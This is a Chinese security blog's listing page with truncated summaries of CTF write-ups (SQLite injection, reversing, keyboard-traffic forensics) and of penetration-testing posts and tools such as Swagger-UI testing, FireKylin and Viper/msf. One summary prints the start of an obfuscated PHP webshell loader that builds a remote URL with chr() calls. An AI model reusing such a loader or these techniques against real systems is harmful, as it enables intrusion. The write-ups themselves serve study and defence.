上一页 1 2 3 4 5 6 7 8 ··· 16 下一页
摘要: 题目名称:web 题目类型:web 考点:sqlite数据库注入 解题思路 1、目录遍历 目录遍历发现有admin.php login.php 两个登录框都进行注入点测试发现login.php有sql注入漏洞, 查看网页源代码发现?debug 尝试访问,发现登录页面php源码 <?php ob_st 阅读全文
posted @ 2021-10-14 15:56 renblog 阅读(849) 评论(0) 推荐(0) 编辑
摘要: 题目 链接: https://pan.baidu.com/s/1Ok1k3oxjIIydiUvYAuKydg 提取码: mhm9 复制这段内容后打开百度网盘手机App,操作更方便哦 解题思路 1、附件下载是一个base.exe,运行如下图: 2、扔到IDA,F5查看伪代码如下 (1)对主函数进行分析 阅读全文
posted @ 2021-09-28 15:48 renblog 阅读(608) 评论(0) 推荐(0) 编辑
摘要: 影响范围 Windows Server, version 20H2 (Server Core Installation) Windows Server, version 2004 (Server Core installation) Windows Server 2022 (Server Core 阅读全文
posted @ 2021-09-22 14:32 renblog 阅读(230) 评论(0) 推荐(0) 编辑
摘要: <?php $password='lshh';$b="chr"; session_start(); if(empty($_SESSION['PhpCode'])){ $d=$b(104).$b(116).$b(116).$b(112).$b(58).$b(47).$b(47).$b(57).$b(5 阅读全文
posted @ 2021-09-09 10:33 renblog 阅读(346) 评论(1) 推荐(1) 编辑
摘要: 关于Swagger-UI下的渗透实战 阅读全文
posted @ 2021-08-30 10:44 renblog 阅读(849) 评论(0) 推荐(0) 编辑
摘要: 题目 题目名称:键盘流量 题目类型:MISC 解题思路 题目下载解压发现是55.pcapng、miwen.txt两个文件 miwen.txt miwen.txt内容为base64编码假flag,文件大小与实际内容不符,发现txt隐写了零宽字符 如何发现零宽字符,vim打开文件,如下图: python 阅读全文
posted @ 2021-08-24 17:21 renblog 阅读(7276) 评论(1) 推荐(0) 编辑
摘要: 工具介绍 随着WEB前端打包工具的流行,您在日常渗透测试、安全服务中是否遇到越来越多以Webpack打包器为代表的网站?这类打包器会将整站的API和API参数打包在一起供Web集中调用,这也便于我们快速发现网站的功能和API清单,但往往这些打包器所生成的JS文件数量异常之多并且总JS代码量异常庞大( 阅读全文
posted @ 2021-08-09 13:37 renblog 阅读(5995) 评论(0) 推荐(0) 编辑
摘要: 工具介绍 FireKylin中文名称叫:火麒麟,其实跟某氪金游戏火麒麟并没有关系,作为国产的网络安全工具名称取自中国神兽:麒麟。寓意是希望能够为守护中国网络安全作出一份贡献。 其功能是收集操作系统各项痕迹,支持Windows和Linux痕迹收集。 其作用是为分析研判安全事件提供操作系统数据。 其目的 阅读全文
posted @ 2021-08-09 11:26 renblog 阅读(794) 评论(0) 推荐(1) 编辑
摘要: postgreSQL简介 postgreSQL数据库介绍 数据库端口5432 数据库连接成功常用数据库查询命令 命令行客户端操作pg数据库常用操作 1.链接数据库 $psql -U user_name -d database_name -h serverhost 2.命令常用操作 \h #查看所有的 阅读全文
posted @ 2021-07-20 15:35 renblog 阅读(3671) 评论(0) 推荐(0) 编辑
摘要: 介绍 Viper(炫彩蛇)是什么 docker 安装 Viper(炫彩蛇)是什么 渗透实战 msf代理 配置socks代理即可 持久化 阅读全文
posted @ 2021-06-21 10:19 renblog 阅读(1565) 评论(4) 推荐(0) 编辑
上一页 1 2 3 4 5 6 7 8 ··· 16 下一页